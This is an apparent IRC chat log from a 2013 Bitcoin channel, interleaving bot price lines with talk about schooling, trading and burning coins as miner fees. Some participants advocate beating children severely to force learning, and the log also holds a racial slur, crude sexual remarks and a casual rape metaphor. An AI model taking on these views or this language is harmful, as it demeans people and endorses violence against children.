23:23:16 jurov punishment only works if the punished literally perceives there is no alternative and his life is forfeit. Apr 25 23:23:19 you cant jump to extremes Apr 25 23:23:20 otherwise it's dicking about. Apr 25 23:23:28 where we left the saying you can't make horse drink ? Apr 25 23:23:35 o but you can. Apr 25 23:23:40 to say somehting is not absolutely solvable, therefore why imrove it Apr 25 23:23:46 imprive* Apr 25 23:23:49 there's a lot of power in the conservation instinct. Apr 25 23:23:49 improve* Apr 25 23:24:02 ThickAsThieves well... you can't improve it the way you broke it i think. Apr 25 23:24:36 and you cant solve it by resorting to the lowest common denominator either Apr 25 23:24:42 you can make the horse drink. but sometimes the horse is Munchausen's horse: http://homepage.ntlworld.com/forgottenfutures/munch/cruik4.gif Apr 25 23:24:46 not solve // improve Apr 25 23:25:19 the problem kids face, especially while small, is that they have no clue. that's why they're in school, to figure shit out. Apr 25 23:25:35 you can't expect them to self-motivate. if they had enough of a clue as to what's what they wouldn't need school. Apr 25 23:25:41 yes, and we can do a better job helping them to do so Apr 25 23:25:50 punishment works if kids know what they are punished for Apr 25 23:25:59 there's nothing to help. all you can do is "learn this!" as an absolute imperative. Apr 25 23:26:07 but who'll bother explaining to them? Apr 25 23:26:07 mircea_popescu: they're in school to figure out hierarchy/obedience. Apr 25 23:26:16 we cant make an increasingly complex society without taking responsibility for ushering people into it Apr 25 23:26:19 asciilifeform these two are not distinct. Apr 25 23:26:21 well, we shouldnt Apr 25 23:26:23 ;;ticker --last Apr 25 23:26:24 133.01000 Apr 25 23:26:32 133, heh Apr 25 23:26:41 as it should be. Apr 25 23:27:49 admittedly i'm a bit more of an idealist, evolutionist Apr 25 23:28:00 [HAVELOCK] [SDICE] 5 @ 0.2975 = 1.4875 BTC [+] Apr 25 23:28:01 [HAVELOCK] [SDICE] 1 @ 0.29769999 BTC [+] Apr 25 23:28:02 [HAVELOCK] [SDICE] 1 @ 0.29789999 BTC [+] Apr 25 23:28:04 [HAVELOCK] [SDICE] 4 @ 0.29809999 = 1.1924 BTC [+] Apr 25 23:28:05 [HAVELOCK] [SDICE] 3 @ 0.29829997 = 0.8949 BTC [+] Apr 25 23:28:06 [HAVELOCK] [SDICE] 2 @ 0.29849997 = 0.597 BTC [+] Apr 25 23:28:07 [HAVELOCK] [SDICE] 1 @ 0.29969999 BTC [+] Apr 25 23:28:08 [HAVELOCK] [SDICE] 1 @ 0.29989 BTC [+] Apr 25 23:28:09 [HAVELOCK] [SDICE] 2 @ 0.2999 = 0.5998 BTC [+] Apr 25 23:28:12 but explain this to me. kid's nine. he should be learning multiplication table. how does that get done ? Apr 25 23:28:14 i do think we can steer our path Apr 25 23:28:23 he has no way to know why it's useful. Apr 25 23:28:26 what now ? Apr 25 23:28:31 good example Apr 25 23:28:40 use a more applied way of schooling Apr 25 23:28:45 that was my problem Apr 25 23:28:48 age honored way is to go "either you learn this or i mash you into a pulp" Apr 25 23:28:51 i learn by doing Apr 25 23:28:54 not by being told Apr 25 23:28:59 this has had kids know multiplication for ~2500 years. Apr 25 23:29:10 huuuge dump Apr 25 23:29:17 the recent method of i dunno wtf it is... has kids... not able to multiply. Apr 25 23:29:18 i remember i had this huge mental block learning geometry Apr 25 23:29:36 yeah, that makes sense...kids (and many other people in society) won't understand why things are necesssary....that's why you say because i told you so Apr 25 23:29:42 yet i got a job that involved it and took to it quickly Apr 25 23:30:01 MJR_ for that matter, people keep going "o, i dunno what good a philosophy degree would be IRL" Apr 25 23:30:11 parents heavily involved... and i knew it is useful Apr 25 23:30:15 and i usually go "ya douchy, i own you in any way and you dunno what my degree is for. wd." Apr 25 23:30:36 the kid is taught the times table to see if he is trainable. as witnessed by the fact that the times table continued to be taught, even in times and places where the people running the show don't give a damn whether anyone actually knows their times table. Apr 25 23:30:44 if they just threatened to pulp me if i don't learn... then i;m not sure i'd really learn Apr 25 23:30:59 jurov not as a theory. Apr 25 23:31:08 some other things i knew i did not need, i did not learn Apr 25 23:31:11 in practice. you get as many lashes as you can take. Apr 25 23:31:17 no matter whet. and just got bad grades Apr 25 23:31:20 ;;goxlag Apr 25 23:31:22 MtGox lag is 50.300903 seconds. During this time, light travels 0.100802446415 AU. You could have sent a bitcoin ten times between Saturn and Titan (0.0802 AU). Apr 25 23:31:22 not bad grades dood. Apr 25 23:31:30 pain until you faint Apr 25 23:31:35 lol Apr 25 23:31:36 cold water, rehash. Apr 25 23:31:48 at some point you either beg to be allowed to learn it Apr 25 23:31:50 or just die. Apr 25 23:31:54 eh, you learn if you want to learn Apr 25 23:31:55 either way, we pre-dig the graves. Apr 25 23:32:03 grim Apr 25 23:32:05 indeed. Apr 25 23:32:08 times table and lashes plus a real person = educated, functional; times table and lashes plus a meat pupper: expert at dodging punishment. Apr 25 23:32:09 mp your approach is simply too primitive for me Apr 25 23:32:15 *puppet Apr 25 23:32:16 i can rationalize it n all Apr 25 23:32:17 there's this VERY grim undercurrent in education people never wish to face. Apr 25 23:32:20 but cmon Apr 25 23:32:28 education in fact has death in it. Apr 25 23:32:34 then i'll be unlearning obedience not 15 years, but 30 if ever Apr 25 23:32:42 life has death in it Apr 25 23:32:47 ThickAsThieves yeah. Apr 25 23:33:08 jurov shockingly obedience is very easy to unlearn if you're trained properly Apr 25 23:33:14 (ie, no excuses are ever made) Apr 25 23:33:21 "with an ugh and a groan and a click of the heels, death comes quiet or it comes with squeals..." Apr 25 23:33:24 everything we do could be called a big distraction from self-awareness of our own mortality Apr 25 23:34:03 mircea_popescu: do tell, and how many of teachers/parents can actually do it properly? Apr 25 23:34:10 virtually none. Apr 25 23:34:18 i don't propose this as a practical solution, mind. Apr 25 23:34:26 i learn without threat Apr 25 23:34:29 you don't seem to have any other solution Apr 25 23:34:33 i learn for incentives Apr 25 23:34:41 and i would say i learn more and faster Apr 25 23:34:49 i enoy learning on my own terms Apr 25 23:34:56 jurov im just saying, this is the way things'd work absolutely. that it's not implementable... not my problem :D Apr 25 23:35:13 fkn hipster... not his prob Apr 25 23:35:16 ehehehe Apr 25 23:35:17 well, take 3 steps back...is learning necessary? not always Apr 25 23:35:30 it's never necessary. it's always useful. Apr 25 23:35:31 if it is necessary, there are two paths Apr 25 23:35:36 yes but you maintain that money cannot be used to improve the overall education level of the US, no? Apr 25 23:35:45 one is disincentive for not learning...punishment Apr 25 23:35:45 but in poihnt of fact you can always survive w/o knowing shit. Apr 25 23:35:53 the other is incentive for learning, reward Apr 25 23:36:02 ThickAsThieves my idea was that the reason us edsucation is fucked atm is exactly the misuse of money. Apr 25 23:36:10 adding more won't credibly help. Apr 25 23:36:14 ^i'd agree Apr 25 23:36:24 its cultural...and hopefully changing for the better Apr 25 23:36:33 heh. notrly. Apr 25 23:36:35 when people say that asians are good at math...its cuz their parents make them good at math Apr 25 23:36:46 they do not have the choice to NOT be good at math Apr 25 23:36:47 kids learn from whoever they respect. in the 1850s that was the teacher. Apr 25 23:36:59 by now it's some gang leader guy, with the charisma and the requisite qualities. Apr 25 23:37:12 MJR_ azns get the stick. a lot. Apr 25 23:37:24 thats two diff problems Apr 25 23:37:35 how we spend money and what to spend it on Apr 25 23:37:52 ThickAsThieves the unions have a great idea on the subject. Apr 25 23:37:53 yes we waste shit tons of cash Apr 25 23:38:04 our priorities are all fucked up Apr 25 23:38:05 notice that you pose false questions. the us govt has absolutely no choice on who and what to spend. Apr 25 23:38:26 the people within it have power to steer the cash Apr 25 23:38:31 it's a "rational agent", ie, like water : can be dammed, can be piped... Apr 25 23:38:38 yes Apr 25 23:38:41 will sit patiently in a glass waiting Apr 25 23:38:52 but my point is, if you "say" you value education but don't, you won't get education Apr 25 23:39:01 if you actually value education, you will get education Apr 25 23:39:16 if your children are in school on saturdays for 8 hours...you value education Apr 25 23:39:17 ya but the problem is there's no way to value education w/o the markings on your ass. Apr 25 23:39:23 yes i agree Apr 25 23:39:28 even if just metaphorically Apr 25 23:39:31 even if. Apr 25 23:39:36 i didnt need to get beat to value learning Apr 25 23:39:37 saturday school? fuck that Apr 25 23:39:45 hehehe, yep Apr 25 23:39:46 problem is, cultures which have this ethos don't need the pathos Apr 25 23:39:52 exactly Apr 25 23:39:55 but americans are disused. they will need to re-learn the hard way Apr 25 23:40:01 exactly Apr 25 23:40:02 so their grandkids might not need actual whippings Apr 25 23:40:07 that is the point Apr 25 23:40:17 you want education, you have to value education Apr 25 23:40:21 ThickAsThieves well i thouight we're discussing statistics. Apr 25 23:40:34 but when parents basically have the attitude of 'not my problem' or "just play along till you get out of school" Apr 25 23:40:46 that is not valuing education Apr 25 23:40:50 indeed. Apr 25 23:40:53 that is paying lip service to education Apr 25 23:41:00 wanting the benefits without the actual work Apr 25 23:41:12 nowadays you go to school so you can say you went to school Apr 25 23:41:14 i'm not discussing stats, nor last resorts Apr 25 23:41:15 quite tautological Apr 25 23:41:27 i am educated because i got education Apr 25 23:41:27 very weak society, one that wants the benefit but doesn't enjoy the labour. Apr 25 23:41:37 i'm saying we need to at least figure out how to figure out improving education Apr 25 23:41:38 point is, you have to learn because you want to know Apr 25 23:41:42 and you want to DO Apr 25 23:42:07 not because you want others to give you credit for having attended a school and paying tuition Apr 25 23:42:17 as a species we are capable of absolutely anything, it's just a matter of when we decide to do so Apr 25 23:42:17 its the biggest example of the free rider problem ever Apr 25 23:43:11 think of it this way, if schools produce education, i can go to one, and rely on the fact that i will be assumed to be educated Apr 25 23:43:22 without actually learning Apr 25 23:43:41 so if you take focus away from what school you went to etc, and on WHAT YOU ACTUALLY KNOW Apr 25 23:43:49 well assumptions don't last long when you actually have to go to work Apr 25 23:43:50 that is a good first step Apr 25 23:43:53 "education" is a seriously abused word in application to the schooling of the masses. The root 'educe' being == 'to bring out.' There isn't usually much to bring out. Apr 25 23:43:56 MJR_ then you're a gypsy racist Apr 25 23:43:57 eh, incompetence is everywhere Apr 25 23:44:06 "The world's best magician cannot pull a rabbit out of a hat unless he is already in the hat." Apr 25 23:44:12 i agreer Apr 25 23:44:14 totally Apr 25 23:44:20 asciilifeform at the risk of sounding insufficiently misanthropic, i beg to differ. Apr 25 23:44:32 you'd be amazed what an excellent cocksucker sleeps in any random chick. Apr 25 23:44:35 time to call it what it is: obedience training. like the dog kind. Apr 25 23:44:48 point is, i want the person at mcdonalds to know the difference between "only lettuce, tomato and ketchup" and "no mustard, onions or pickles" Apr 25 23:44:59 they don't have to be geniuses Apr 25 23:45:08 but they should not be complete retards Apr 25 23:45:18 because that negatively impacts MY quality of life Apr 25 23:45:24 MJR_ the solution is pictograms. or ditch the clerk and install robots. Apr 25 23:45:26 i don't think you can safely identify someone that way. Apr 25 23:45:36 this is the non altruistic argument for why education is important for all Apr 25 23:45:39 my cto used to drive a truck for instance. Apr 25 23:46:12 i usually find that i learn the MOST when i have to solve a problem...no problems, no learning Apr 25 23:46:38 well yes, and at one point I ran cables. there needs to be an escape hatch, and the process is rather inefficient right now Apr 25 23:46:46 i figured out how to use *nix systems because i didn't have a computer and wanted my iphone to do everything a computer could do Apr 25 23:47:15 so i figured out symbolic links (this was before iOS 1.1) and i figured out filesystems, etc Apr 25 23:47:29 i figured out package management...and all the other things, to get what i wanted Apr 25 23:47:34 just a small example Apr 25 23:47:36 sounds like a beating. Apr 25 23:47:49 i suppose...but now i welcome challenges Apr 25 23:48:04 i only feel happy when i am overcoming something Apr 25 23:48:13 figuring out something Apr 25 23:48:22 ;;goxlag Apr 25 23:48:23 MtGox lag is 118.574281 seconds. During this time, light travels 0.2376215315 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 25 23:48:24 typical #assets .. everyone talking about themselves and their beliefs, just mircea about sex Apr 25 23:48:31 look, they fixed it Apr 25 23:48:32 HAHAHA Apr 25 23:48:36 mircea_popescu: don't know about you, but I would prefer a system that is up-front about the goal of separating people from meatpuppets, rather than pretending to do a million other inconsequential things Apr 25 23:48:45 ^^agree Apr 25 23:48:53 fu ju rov :D Apr 25 23:49:05 asciilifeform i don't believe that separation is a matter of fact. Apr 25 23:49:11 i've never met actual meat puppets. Apr 25 23:49:14 lol Apr 25 23:49:18 jurov my belifs are that is not the case! urlpls mircea Apr 25 23:49:32 http://polimedia.us/dtng/c/src/136667640924.gif Apr 25 23:49:33 mircea_popescu: the "people who must be told how to live" Apr 25 23:49:36 make it last im running out. Apr 25 23:49:50 asciilifeform this includes most researchers you know ?! Apr 25 23:49:59 fuck, rms needs to be told to take a bath. Apr 25 23:50:00 [HAVELOCK] [VTX] 3 @ 0.4892 = 1.4676 BTC [+] Apr 25 23:50:16 mircea_popescu: most researchers are meat puppets (with good calculating and recall ability) Apr 25 23:50:26 ya well you sound en route to the party of one Apr 25 23:50:28 can't, the bath is proprietary Apr 25 23:50:34 ahahaha Apr 25 23:50:38 lol Apr 25 23:50:39 scrat wins interwebs Apr 25 23:51:00 [HAVELOCK] [VTX] 1 @ 0.4251 BTC [-] Apr 25 23:51:01 [HAVELOCK] [VTX] 6 @ 0.42500001 = 2.55 BTC [-] Apr 25 23:51:02 hehehe Apr 25 23:51:02 [HAVELOCK] [VTX] 7 @ 0.425 = 2.975 BTC [-] Apr 25 23:51:06 mircea_popescu: I'm more of a "reich der zwei" sort of guy Apr 25 23:51:11 even so. Apr 25 23:51:23 anyway, people either avoid challenges or welcome them, that is a great heuristic for separating out those who will learn and those who will do what they are told Apr 25 23:51:44 i avoid most challenges. what nao ?! Apr 25 23:52:00 [HAVELOCK] [VTX] 7 @ 0.425 = 2.975 BTC [-] Apr 25 23:52:11 yeq. i went into bitcoin in hope to avoid some challenges, too :D Apr 25 23:52:30 sort of how cats spend most of their time sitting around. efficient predators. Apr 25 23:53:01 [HAVELOCK] [VTX] 1 @ 0.42 BTC [-] Apr 25 23:53:07 with cats its prolly the conspiracy of being cute. Apr 25 23:53:28 kakobrekla got a better one for you : http://polimedia.us/dtng/c/src/136685028116.gif Apr 25 23:53:38 lol Apr 25 23:54:00 [HAVELOCK] [VTX] 3 @ 0.415 = 1.245 BTC [-] Apr 25 23:54:01 "honey... gotta put these in water" Apr 25 23:54:03 i see the roses i bought were put to good use Apr 25 23:54:07 lol Apr 25 23:54:33 lol Apr 25 23:55:12 mircea_popescu: avoid challenges that can't be avoided...hard to explain i guess, but some things have to be done, not talking about wasting effort Apr 25 23:56:12 yes. sometimes hard to distinguish from outside. Apr 25 23:57:11 rms above is a bad example. he has a "mad hermit" image (external and internal, as well) to maintain. Apr 25 23:57:37 tbh i think he's just mildly retarded. Apr 25 23:57:49 his unbathed carcass and rags are as important as an actress's manicure. Apr 25 23:57:59 even if he's a natural. Apr 25 23:58:00 ;;goxlag Apr 25 23:58:00 MtGox lag is 2.923985 seconds. During this time, light travels 0.00585963320143 AU. You could have sent a bitcoin from Jupiter to its largest moon, Ganymede (0.007155 AU). Apr 25 23:58:17 dude everything's a conspiracy with you. Apr 25 23:58:27 oh lol 134 Apr 25 23:58:54 131 Apr 25 23:58:59 more like "prospiracy" (things that happen a certain way, because it actually makes sense, but having the appearance of purpose.) Apr 25 23:59:04 jborkl there was a dude earlier telling me my article is out of date Apr 25 23:59:12 rather than updating the article i updated the price Apr 25 23:59:16 oh my people running at the door screaming Apr 25 23:59:20 good call on that Apr 26 00:00:02 people panic so much, so easy to predict Apr 26 00:05:04 one needs to be constantly vigilant toward self... to not fall into habit of using self's intelligence to make others appear dumb, for example Apr 26 00:10:11 [BTCTC] [S.BBET-PT] 1 @ 0.00199 BTC [+] Apr 26 00:10:23 what are you like a kantian ? Apr 26 00:15:44 panic time, fleanode netsplit Apr 26 00:16:15 ;;ticker --last Apr 26 00:16:16 130.04000 Apr 26 00:17:07 ;;ticker --next Apr 26 00:17:07 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a (1 more message) Apr 26 00:17:10 :) Apr 26 00:18:03 fleanode lmao Apr 26 00:18:38 ;;ticker Apr 26 00:18:39 BTCUSD ticker | Best bid: 132.79999, Best ask: 132.80000, Bid-ask spread: 0.00001, Last trade: 132.79999, 24 hour volume: 145217.59936021, 24 hour low: 120.08900, 24 hour high: 162.00000, 24 hour vwap: 144.61258 Apr 26 00:19:09 "to feague a horse is to put ginger up a horse’s fundament, and formerly, as it is said, a live eel, to make him lively and carry his tail well. It is said, a forfeit is incurred by any horse-dealer’s servant, who shall show a horse without first feaguing him." Apr 26 00:23:30 [MPEX] [S.MPOE] 7750 @ 0.00069843 = 5.4128 BTC [+] Apr 26 00:24:29 newsflash eel meat found in horse sausages! Apr 26 00:25:25 ahaha Apr 26 00:31:04 wow that was fun Apr 26 00:31:49 driving down the interstate 5 lanes each direction at 80 mph buying and selling through my android in my diesel 4x4 truck Apr 26 00:32:23 ... Apr 26 00:33:08 To decorate or improve in appearance through artificial means. Apr 26 00:33:08 To increase the liveliness of a horse by inserting an irritant, such as a piece of peeled raw ginger or a live eel, in its fundament. Apr 26 00:33:24 wow, talk about a time when context could really matter\ Apr 26 00:34:00 lol Apr 26 00:34:20 that girl was really feaguing Apr 26 00:34:47 and lol...there is actually a 3rd entry Apr 26 00:34:55 (obsolete) To beat or whip; to drive. Apr 26 00:35:23 either whipping, sticking eels up horses asses, or making yourself pretty with makeup...how could anyone ever miscontrue what i meant? Apr 26 00:35:46 don't look a gift horse... in the arse? Apr 26 00:35:49 hahaha Apr 26 00:35:54 all forms of primping :) Apr 26 00:36:16 sawdust in the gearbox, apparently timeless. Apr 26 00:36:59 they literally aren't that distinct are they :D Apr 26 00:47:09 http://www.greaterfool.ca/wp-content/uploads/2013/04/kid.jpg?161856 Apr 26 00:58:22 HAH Apr 26 01:01:28 just looked at chart... shit... a couple hours can be an eternity in bitcoin land... Apr 26 01:01:47 :) Apr 26 01:02:17 what now Apr 26 01:02:20 ;;ticker Apr 26 01:02:21 BTCUSD ticker | Best bid: 142.16804, Best ask: 142.49990, Bid-ask spread: 0.33186, Last trade: 142.16804, 24 hour volume: 166821.51265896, 24 hour low: 120.08900, 24 hour high: 162.00000, 24 hour vwap: 143.49206 Apr 26 01:02:23 heh Apr 26 01:02:47 someone dumped A LOT of coin... jeez... Apr 26 01:10:17 can someone explain what happened that caused the drop to $90? Apr 26 01:10:45 lol Apr 26 01:10:56 pizza was delivered to the gox headquarters Apr 26 01:10:59 the rest is history Apr 26 01:11:07 this shit is nutty Apr 26 01:11:17 some corn on the side too Apr 26 01:12:05 no really, i dont see much on reddit and wasnt around at the time Apr 26 01:12:10 so what really happened? Apr 26 01:12:25 should we tell him? Apr 26 01:12:52 look, its like this..this shit is nuttier than a port-o-potty at a peanut festival Apr 26 01:12:55 jurov: ssshhh Apr 26 01:13:07 lol Apr 26 01:13:10 haha Apr 26 01:13:37 what do you mean $90... I don't see that anywhere... Apr 26 01:14:03 prolly a different exchange? Apr 26 01:14:05 25th at 22:25 for 91 Apr 26 01:14:09 mtgoxusd Apr 26 01:15:03 maybe that was the limit price? Apr 26 01:15:10 gesell someone fucked up the wash trading ? Apr 26 01:15:30 low was around 120 Apr 26 01:18:49 hmm... well i had a lot of orders at $88 that got fulfilled Apr 26 01:19:02 guess it was my fault Apr 26 01:20:56 oh blah Apr 26 01:20:57 my bad Apr 26 01:20:58 sorry Apr 26 01:21:03 just reading the gox emails wrong Apr 26 01:21:15 was from a long time ago Apr 26 01:22:47 [BTCTC] [ASICMINER-PT] 1 @ 1.16 BTC [-] Apr 26 01:26:00 [HAVELOCK] [HIM] 1 @ 1.705 BTC [-] Apr 26 01:28:36 [BTCTC] [BTC-GOLD] 1 @ 0.00111 BTC [-] Apr 26 01:31:56 ;;tiocker Apr 26 01:31:57 Error: "tiocker" is not a valid command. Apr 26 01:31:58 ;;ticker Apr 26 01:31:59 BTCUSD ticker | Best bid: 142.25001, Best ask: 142.36000, Bid-ask spread: 0.10999, Last trade: 142.36000, 24 hour volume: 177752.29026620, 24 hour low: 120.08900, 24 hour high: 162.00000, 24 hour vwap: 143.50780 Apr 26 01:32:15 [MPEX] [S.MPOE] 1293 @ 0.00069843 = 0.9031 BTC [+] Apr 26 01:44:47 mircea_popescu, that's what they call you. bitcoin billi-on-aire, lots of niggas say it ain't fair. Apr 26 01:45:10 oddly, it's the crackers sayin' it ain't fair. Apr 26 01:45:24 LOL Apr 26 01:45:37 haters everywhere, tell em to grow a pair? Apr 26 01:46:12 as you sit in your lair, surrounded by bitches shaved with nair. Apr 26 01:47:05 "The Less That You Wear, the More You Need Nair!" Apr 26 01:47:08 lmao that's retarded. Apr 26 01:47:58 hahaha Apr 26 01:49:04 basically sodium hidroxide ?! ouch. Apr 26 01:50:36 [MPEX] [S.MPOE] 1550 @ 0.00069955 = 1.0843 BTC [+] Apr 26 01:52:52 [BTCTC] [B.YABMC] 1 @ 0.01629 BTC [+] Apr 26 01:53:59 [HAVELOCK] [HIM] 1 @ 1.7997 BTC [+] Apr 26 01:55:00 [HAVELOCK] [VTX] 10 @ 0.4485 = 4.485 BTC [+] Apr 26 01:55:01 [HAVELOCK] [VTX] 10 @ 0.4485 = 4.485 BTC [+] Apr 26 02:00:39 [MPEX] [S.MPOE] 5950 @ 0.00070076 = 4.1695 BTC [+] Apr 26 02:03:00 [HAVELOCK] [VTX] 4 @ 0.4485 = 1.794 BTC [+] Apr 26 02:17:00 [HAVELOCK] [VTX] 11 @ 0.4201 = 4.6211 BTC [-] Apr 26 02:17:01 [HAVELOCK] [VTX] 1 @ 0.42 BTC [-] Apr 26 02:18:59 [HAVELOCK] [VTX] 4 @ 0.40070003 = 1.6028 BTC [-] Apr 26 02:19:00 [HAVELOCK] [VTX] 25 @ 0.40070002 = 10.0175 BTC [-] Apr 26 02:25:00 [HAVELOCK] [HIM] 1 @ 1.7997 BTC [+] Apr 26 02:27:18 [BTCTC] [COGNITIVE] 1 @ 0.198 BTC [+] Apr 26 02:27:56 [BTCTC] [COGNITIVE] 5 @ 0.1981 = 0.9905 BTC [+] Apr 26 02:29:53 [BTCTC] [COGNITIVE] 5 @ 0.1983 = 0.9915 BTC [+] Apr 26 02:34:59 [BTCTC] [BTC-BOND] 6 @ 0.009996 = 0.06 BTC [+] Apr 26 02:35:10 [BTCTC] [BTC-BOND] 5 @ 0.009997 = 0.05 BTC [+] Apr 26 02:35:12 [MPEX] [S.MPOE] 9050 @ 0.00070076 = 6.3419 BTC [+] Apr 26 02:35:14 [MPEX] [S.MPOE] 11617 @ 0.00070092 = 8.1426 BTC [+] Apr 26 02:35:22 [BTCTC] [BTC-BOND] 2 @ 0.009999 = 0.02 BTC [+] Apr 26 02:37:00 [HAVELOCK] [SDICE] 2 @ 0.28000002 = 0.56 BTC [-] Apr 26 02:37:01 [HAVELOCK] [SDICE] 10 @ 0.28000001 = 2.8 BTC [-] Apr 26 02:38:07 [BTCTC] [RSM] 1 @ 0.00303 BTC [-] Apr 26 02:38:10 [BTCTC] [RSM] 238 @ 0.00302 = 0.7188 BTC [-] Apr 26 02:46:44 ;;ticker Apr 26 02:46:45 BTCUSD ticker | Best bid: 140.10015, Best ask: 140.98999, Bid-ask spread: 0.88984, Last trade: 141.22614, 24 hour volume: 187759.77712509, 24 hour low: 120.08900, 24 hour high: 162.00000, 24 hour vwap: 143.12243 Apr 26 02:52:52 epic troll? http://www.americanbanker.com/bankthink/governments-must-co-opt-bitcoin-to-avert-disaster-1058380-1.html?zkPrintable=1&nopagination=1 Apr 26 02:53:57 There are currently 151705.18 bitcoins demanded at or over 50.0 USD, worth 12737481.7987 USD in total. | Data vintage: 0.0082 seconds Apr 26 03:03:14 There are currently 21257.668 bitcoins demanded at or over 120.0 USD, worth 2718075.47269 USD in total. | Data vintage: 0.0060 seconds Apr 26 03:05:07 http://www.nature.com/srep/2013/130425/srep01684/full/srep01684.html Apr 26 03:05:17 hurt yourself reading what i'm reading Apr 26 03:06:29 jcpham: idea: rape the algo traders who read this by implementing a contrarian algo Apr 26 03:17:00 [HAVELOCK] [SDICE] 1 @ 0.29 BTC [+] Apr 26 03:17:02 A recent investigation has shown that the number of clicks on search results stemming from a given country correlates with the amount of investment in that country Apr 26 03:17:08 totally. this is so useful and everything. Apr 26 03:17:22 buncha onanists, these people. Apr 26 03:27:35 hi, i'm back with couple of questions Apr 26 03:27:41 mircea still here? Apr 26 03:27:57 yea Apr 26 03:29:04 cool, so i've been thinking really hard about destorying, and really the only way this system would be viable if the destroy funds are either really destroyed, sent to void, sent back to blockchain somehow Apr 26 03:29:52 i'm wondering what ways there are to do 1. really destroy bitcoins 2. blackhole it 3. give it back to blockchain Apr 26 03:29:58 could you help? Apr 26 03:30:29 what's the difference between 1 and 2 Apr 26 03:30:42 well, 1 justg send them to a fixed address like 1blackhole398759347589 Apr 26 03:30:48 i don't know as i don't know how to do either Apr 26 03:31:04 3 is best Apr 26 03:31:13 you dont want to be a destroying coins Apr 26 03:31:20 and you couldnt prove that you were Apr 26 03:31:27 seongyupyoo its simple, just send coins to an address that nobody has the key for. Apr 26 03:31:28 ok so 1 and 2 are same Apr 26 03:31:37 something arbitrary, like 1thisaddressisablackhole Apr 26 03:31:50 you'll need to calculatge the checksums so it validates, but that's no big deal Apr 26 03:31:59 ok Apr 26 03:32:14 3 you could just add it as miner fee in a tx. Apr 26 03:32:15 but the problem there is you are accelerating deflation Apr 26 03:32:23 so i got that now 1 and 2 are same and you just send to an address that no one has key to Apr 26 03:32:25 like, make a tx with 100 btc inputs, 1 satoshi outputs Apr 26 03:33:02 i'm not following you when you say make tx with 100 input to and 1 output Apr 26 03:33:19 all bitcoin txs have some inputs and some outputs. Apr 26 03:33:20 how verifiable is adding as fee though? Apr 26 03:33:23 very. Apr 26 03:33:25 he means .00000001 output Apr 26 03:33:35 people will need to be able to see that their exact fund amount has been destroyed at that time Apr 26 03:33:53 easy you just link them to the tx Apr 26 03:33:56 you just check the tx in blockchain, it'll be there. 100 goes in, 1 goes out so 99 was miner fee Apr 26 03:34:07 or w/e actual numbers. Apr 26 03:34:15 [MPEX] [S.MPOE] 4033 @ 0.00070092 = 2.8268 BTC [+] Apr 26 03:34:17 [MPEX] [S.MPOE] 11595 @ 0.00070129 = 8.1315 BTC [+] Apr 26 03:34:52 so send money from my wallet to my wallet with 100 input and 1 output if i don't to give back 99? Apr 26 03:35:21 um Apr 26 03:35:25 come again ? Apr 26 03:35:50 i'm just trying to clarify how to make a transaction Apr 26 03:36:00 who is it going to and from? Apr 26 03:36:08 whoever you want. Apr 26 03:36:08 100 input and 1 output Apr 26 03:36:15 you have to send an actual amount (i think) plus a tx fee Apr 26 03:36:19 i think you'll have to read up on how bitcoin txs work Apr 26 03:36:25 most of the destroyed coin would be sent as the tx fee Apr 26 03:36:32 send 0.00000001 BTC to any address, and specify a fee of 99BTC Apr 26 03:36:32 but you would send .00000001 of it to yourself Apr 26 03:36:33 i see so it is fee Apr 26 03:36:48 i understand that, i thought there was another way to manually setting input and output Apr 26 03:36:55 how bad is destroying to blackholeaddress? Apr 26 03:37:05 i think its bad Apr 26 03:37:11 pretty bad yea. Apr 26 03:37:14 and not necessary Apr 26 03:37:17 ok Apr 26 03:37:26 i think that settles it then Apr 26 03:37:42 but do what mp said Apr 26 03:37:46 learn more about tx Apr 26 03:37:49 and blockchain Apr 26 03:37:55 and what your options are Apr 26 03:37:57 i identified 4 big issues from all the feedback i gather today Apr 26 03:38:09 because you might not want to send a 100btc tx fee Apr 26 03:38:20 you might want to send a lot of small ones Apr 26 03:38:30 depending on how mining pools snag them Apr 26 03:38:31 would you guys like to hear the 4 problems, and my plan to solve them? Apr 26 03:38:39 sure. Apr 26 03:39:07 well, if i send a lot of small ones, it would be hard for the traders to check their fund was destroyed Apr 26 03:39:22 you can send more than one tx at once i think Apr 26 03:39:34 i should start running a pool where i keep the transaction fee lol Apr 26 03:39:59 then i'd need to provide many transation id as a proof of destruction Apr 26 03:40:19 i think big fee would be fine Apr 26 03:40:23 maybe Apr 26 03:40:30 also i figured out a way so that nobody will ever have to risk 100 BTC Apr 26 03:40:37 probably 1 BTC to 10 BTC max Apr 26 03:41:04 so max destruction is going to be 20-40 BTC at most Apr 26 03:41:27 anyways, the first problem was issue of me running away with risk funds Apr 26 03:41:35 you are now arbitrarily setting what is ok give to pool ops? Apr 26 03:41:56 I think I can remedy that by putting nashx under my current business of 7 years -> http://mosaically.com Apr 26 03:42:07 so nashx might run under nashx.mosaically.com Apr 26 03:42:27 what do you guys think? Apr 26 03:43:29 2nd problem was destroying of the destroyed funds, and i'll handle that by sending it back to blockchain as fee Apr 26 03:43:38 [MPEX] [S.MPOE] 46572 @ 0.000703 = 32.7401 BTC [+] Apr 26 03:44:27 3rd problem is transparency, basically the ability for people to be able to see all that is happening in terms of transactions Apr 26 03:45:10 i'll remedy that by making all transactions and messages between trader and such available for public view Apr 26 03:45:17 1st problem seems like a non-problem with a non-solution Apr 26 03:46:17 well someone thought that it was an issue, you're right it might not really be an issue. and it really isn't, but it was brought up, and i can see how some people might see that as risk Apr 26 03:46:32 where as if it was under mosaically umbrella, then it would be under a corporation Apr 26 03:46:39 more legit Apr 26 03:46:55 usagi: nashx.com/about Apr 26 03:46:56 no i don't, i just made something called nashx Apr 26 03:47:17 last problem is problem of big transactions Apr 26 03:47:31 seongyupyoo, balances and txes are public and audiable... so transparency is not a big issue Apr 26 03:47:36 yes i will see this through Apr 26 03:47:50 at least to the next version having solve these 4 problems Apr 26 03:47:56 [BTCTC] [BTC-BOND] 35 @ 0.01 = 0.35 BTC [+] Apr 26 03:47:58 and i'll post it on reddit again, get feedback Apr 26 03:48:04 sholdn't take long Apr 26 03:48:08 for the 3rd problem you can simply make your escrow address publicly known Apr 26 03:48:13 or addresses Apr 26 03:48:27 however if you escrow everything you slow it down Apr 26 03:48:42 